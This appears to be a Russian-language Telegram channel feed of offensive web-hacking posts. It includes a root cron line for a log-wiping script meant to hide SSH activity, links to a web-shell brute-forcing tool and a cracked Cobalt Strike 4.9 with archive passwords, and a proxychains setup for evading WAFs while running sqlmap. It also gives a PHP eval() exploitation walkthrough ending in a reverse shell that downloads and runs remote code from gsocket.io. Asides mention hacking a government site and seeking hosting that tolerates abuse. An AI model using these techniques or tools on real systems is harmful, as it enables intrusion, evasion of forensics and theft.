Web Application Security Notes
563 subscribers
49 photos
1 video
10 files
25 links
For me
Download Telegram
log_cleaner.sh
1.7 KB
Чтобы безопасно использовать виртуальные сервера (вдс/впс), нужно всегда чистить логи, потому что в логах сохраняются все ваши действия и ваши айпишники, с которых вы подключаетесь по ssh или любому другому протоколу, вручную это делать долго, поэтому мы сделали скрипт 😆

Запуск:
echo "*/5 * * * * <path_to_script>" >> /var/spool/cron/crontabs/root


chmod +x script.sh
1
Channel photo updated
#pbs #autohack
Программа для автоматического парсинга, брута и заливки шеллов на сайт (старый софт, раньше продавался, насколько я знаю, уже несколько лет не поддерживается)

https://disk.yandex.ru/d/wMK6loN2qa_0WQ
пароль bravesec
image_2021-04-21_11-13-08.png
10.3 KB
#waf #proxy #config #proxychains
Лайфхак как юзать прокси для обхода ваф, когда нужно, к примеру, каждый запрос делать с другого ипа.

apt install proxychains 
nano /etc/proxychains.conf

random_chain
chain_len = 1
quiet_mode
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 93.177.***.*** 1085
заполняем кучей проксей

После запускаем любой скрипт через proxychains типа
proxychains sqlmap.py
#script #Полезные_Штуки
https://github.com/aboul3la/Sublist3r

Скрипт для поиска поддоменов.

python sublist3r.py -d domain.ru
Cobalt Strike 4.9

Download
: https://ponies.cloud/c2/CobaltStrike%204.9%20Cracked%20uCare@Pwn3rzs.7z
Password: 20231004_2218

Full Black client: https://ponies.cloud/c2/CobaltStrike%204.9%20Client%20Only%20Full%20Theme%20uCare@Pwn3rzs.7z
Password: 20231005_2033
👍1
Acunetix_23.11.rar
256.7 MB
Буду иногда выкладывать тем, чем пользуюсь и писать заметки иногда, а то сохранённые сообщения уже переполнены 😆
MoElDump-master.zip
10.4 KB
Дампер написали уже пару лет назад, но всё равно иногда пользуюсь (под монгодб и эластик)
1
Коменты открыл и привязал чатик 😆. Мой главный вопрос, откуда вы узнали про этот канал?) я его забросил в 2023 году, неужели нужно дальше выкладывать такие штуки?
Знаю, что многие используют окунь немного неправильно, вот одна из причин (возможно кто-то не знал про это)

1. Первым делом мы должны с вами запустить Burp, залогинится в нашу цель, тыкнуть на таргеты и сохранить все запросы в xml.

2. Кормим этот файл в акунетикс

Это довольно сильно повысит ваши шансы найти уязвимости в тех сайтах, где нужна авторизация.
8👍2
Web Application Security Notes
#script #Полезные_Штуки https://github.com/aboul3la/Sublist3r Скрипт для поиска поддоменов. python sublist3r.py -d domain.ru
https://www.youtube.com/shorts/qn6OGt6GqHQ

В прошлый раз, я показывал как собирать поддомены и выкладывал скрипт, но это было в 2021 году... Сейчас появились инструменты получше:
Теперь мы можем увидеть не только зарегистрированные поддомены, но и те которые резолвятся, какой ответ получают, подключать куча сервисов по апишке и даже выстраивать графики.

https://github.com/screetsec/Sudomy.git

./sudomy -d domain -dP -eP -rS -cF -pS -tO -gW --httpx  -aI webanalyze -sS
👍52
Быстро работают, оказывается если ломануть правительственный сайт - то лочат сервера...
3
История о том, как я решил пройти собеседование в двух компаниях ПТ и Грибы (facct), специализирующейся на информационной безопасности, приводит меня к размышлениям о процессе найма и работе в области пентестов веб приложений.

Первые собеседования с представителями отдела кадров прошли гладко. Обсуждались общие темы, вопросы о типах уязвимостей, клиент сайд, сервер сайд, разновидности xss и другие общие вопросы. Эти этапы были стандартными и предсказуемыми. Затем настало время технических собеседований.

Ожидания от технической части интервью были высоки, учитывая мой опыт работы в отрасли уже более пяти лет и должность на довольно высокой позиции... Начало технического интервью было обещающим, задавались типичные сценарии веб-приложений и обсуждались возможные векторы атак. Однако процесс внезапно стал затянутым и направлен на администрирование, что меня сильно удивило.

Во время интервью меня начали расспрашивать о темах, не относящихся к пентестам, таких как настройка cross-domain policy и другие административные аспекты. Это вызвало у меня недоумение, потому что я считаю, что подобные моменты можно прогуглить, ну надо тебе настроить, ну напиши в гугле и настрой, нахера мне учить это? Вопросы о работе сериализации и десериализации на различных языках также отклонились от темы пентестов. Мне показалось что им гораздо важней, чтобы я смог написать им уязвимое приложение, нежели найти уязвимости в реальных приложениях.

Итогом этого опыта стала потеря нервов и понимание того, что компания не сосредоточена на реальных пентестах, а больше на том, чтобы состряпать им очередной хакатончик, цтфочку, стэндофчик или митап. Работники больше ориентированы на тендеры в ASV сканировании похоже, чем на практическую работу с безопасностью. Видимо, они просто сидят, сканируют, потом переводят отчёт со сканера, получают деньги и всё, на эти деньги делают какие-то мероприятия. Это могло привести к недостаткам в области информационной безопасности, особенно с учетом уязвимости многих государственных приложений в последнее время.

Мой совет для тех, кто ищет работу в области информационной безопасности, - выбирайте компании, где ценится реальное практическое понимание области, а не только теоретические знания. Ищите единомышленников, увлеченных информационной безопасностью на деле, а не только на бумаге.
😁3
Но я не участвовал в ботнете 😆
2🔥1🥰1
Если у кого-то есть хостинг серверов, которые не блочат - напишите, нексус отпал 😆
Из интересного:
Дано: веб приложение с eval($cmd); почти все пхп функции отключены (system, passthru, exec, shell_exec). evalsploit не помогает
Решение:
Получаем пхпинфо и смотрим какие функции отключены.
shell.php?cmd=phpinfo();

Далее получаем список доступных функций:
shell.php?cmd=print_r(get_defined_functions());

В данном веб приложении была обнаружена функция "popen", выполняем whoami

shell.php?cmd=$h=popen(%27whoami%27,%27r%27);echo%20fread($h,4096);pclose($h);

Выбираем реверс шелл, в данном случае я использовал gsocket

eval('
$cmd = file_get_contents("http://gsocket.io/y");
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);

$process = proc_open("bash -c \"$cmd\"", $descriptorspec, $pipes);
if (is_resource($process)) {
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo $output;
}
');

Профит (скрины в комменты закину)
4👍4
Написал небольшую статью, по не сильно популярной (на данный момент) технике sql injection.
Скриншоты и описание были сделаны под тестовую среду, но побудило меня разобраться и сделать этот пост реальный кейс, который к сожалению на данный момент я не могу разглашать.

https://telegra.ph/Voice-Based-SQL-Injection-03-07

P.S вкратце кейс был такой: была строка поиска и был голосовой ввод, если пишешь ковычку - то всё норм, если говоришь её типа quote, то он sql лог вываливал
👍6
Наш чатик "хацкеров" был заблокирован (непонятно за что, саппорт так и не ответил), поэтому новый открыт, для тех кто потерял "Hiddmond" - заходите https://t.me/hiddmond0
image_2025-03-26_22-10-36.png
77.6 KB
Эм, господа из ФБР, вы могли мне просто на почту или в тг написать... 😆
😁1